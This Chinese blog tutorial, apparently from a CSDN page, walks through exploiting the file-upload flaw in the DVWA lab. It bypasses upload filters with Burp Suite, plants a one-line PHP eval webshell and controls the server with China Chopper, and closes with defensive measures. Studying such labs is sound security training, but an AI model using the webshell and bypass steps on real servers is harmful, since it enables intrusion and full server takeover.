上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

文章介绍了如何通过修改文件扩展名,如将PHP文件改为图片格式,来绕过服务器的上传验证。同时,讨论了一句话木马的概念,以及如何使用中国菜刀工具进行远程管理。通过BurpSuite抓包工具,可以改变文件类型,从而上传并执行PHP代码,实现对服务器的控制。

1、常见漏洞分类

 2、常见验证手段

 

 可抓包后修改扩展名为图片格式,再上传可绕过验证。如:

 

可以修改php文件后缀为其他,再上传。如test.php.xxx

 可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。

 

 客户端验证绕过的方法有:

 例:

 

3、一句话木马

1)木马分为大马、小马和一句话木马:

      小马:文件体积小、上传文件、文件修改、文件管理

      大马:文件体积较大、功能齐全、能够提权、操作数据库等(不推荐)

     一句话木马:短小精悍、功能强大、隐蔽性好、客户端直接管理(主流)

2)中国菜刀工具使用:

百度下载工具——运行caidao.exe

 这里以php为例
首先我们先将php一句话木马上传到目标服务器中,用菜刀去尝试连接

新建一个php文档,输入一句话木马:<?php @eval($_POST['x']);?> 保存为10.php。

注意:x为菜刀连接时密码,可修改为其他字符。

再将10.php重命名为10.php.jpeg。(目标网站过滤上传jpeg和png文件)

 打开burp软件,开启捕获。

 再选择10.php.jpeg文件上传

 将文件名修改为10.php,上传文件类型仍然是image/jpeg,可绕过上传过滤。

brup中关闭捕获。

dvwa中可见上传成功了!

 ../../表示当前路径的上一级、上一级。

复制上传成功后的路径,粘贴到当前浏览器地址的上一级、上一级得到完整路径。

即:http://ip/hackable/uploads/10.php

复制此路径,在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。

再右键此站点,选择要执行的命令——选文件管理,可操作此服务器上所有文件。

 

 

 

### DVWA 中的句话木马利用方法 在DVWA环境中,文件包含漏洞可以被攻击者用来执行恶意代码。当涉及到句话木马时,通常是指段非常简洁的PHP代码,它能够接收来自远程客户端的指令并执行相应的命令。 对于DVWA中的文件上传功能,如果存在安全漏洞,则允许攻击者上传特制文件(如带有隐藏PHP代码的图像),并通过访问该文件来触发服务器端执行恶意脚本[^1]。 #### 利用过程 为了成功利用漏洞: - 攻击者会准备个看似正常的图片文件,在其中嵌入了行简单的PHP代码作为webshell。 ```php <?php @eval($_POST['cmd']);?> ``` - 使用Burp Suite这样的工具拦截HTTP请求,并修改MIME类型或其他参数以绕过某些基本的安全检测机制[^4]。 - 成功上传后,通过浏览器或者其他方式向这个已上传到服务器上的特殊文件发送特定格式的数据包,从而实现远程控制目标主机的目的。 然而需要注意的是,在实际测试过程中可能会遇到各种原因导致上述操作无法顺利完成,比如因为fwrite函数后面指针名称错误等问题而使得整个流程失败[^3]。 ### 防护措施建议 针对此类风险,可以从以下几个方面加强系统的安全性: - **输入验证**:严格检查所有用户提交的内容,特别是文件上传部分,确保只接受预期类型的文件,并对文件头进行校验防止伪装成其他形式的可执行代码混入系统内部。 - **权限管理**:合理设置Web应用程序及其工作目录下的读写权限,避免不必要的开放;同时也要注意操作系统层面的安全策略调整,减少潜在威胁面。 - **禁用危险函数**:可以在`php.ini`配置文件中关闭些容易引发安全隐患的功能调用,像这里的`eval()`就是个典型例子[^2]。 - **定期更新补丁**:保持所使用的软件版本处于最新状态,及时安装官方发布的修复程序,以此封堵可能存在的未知漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值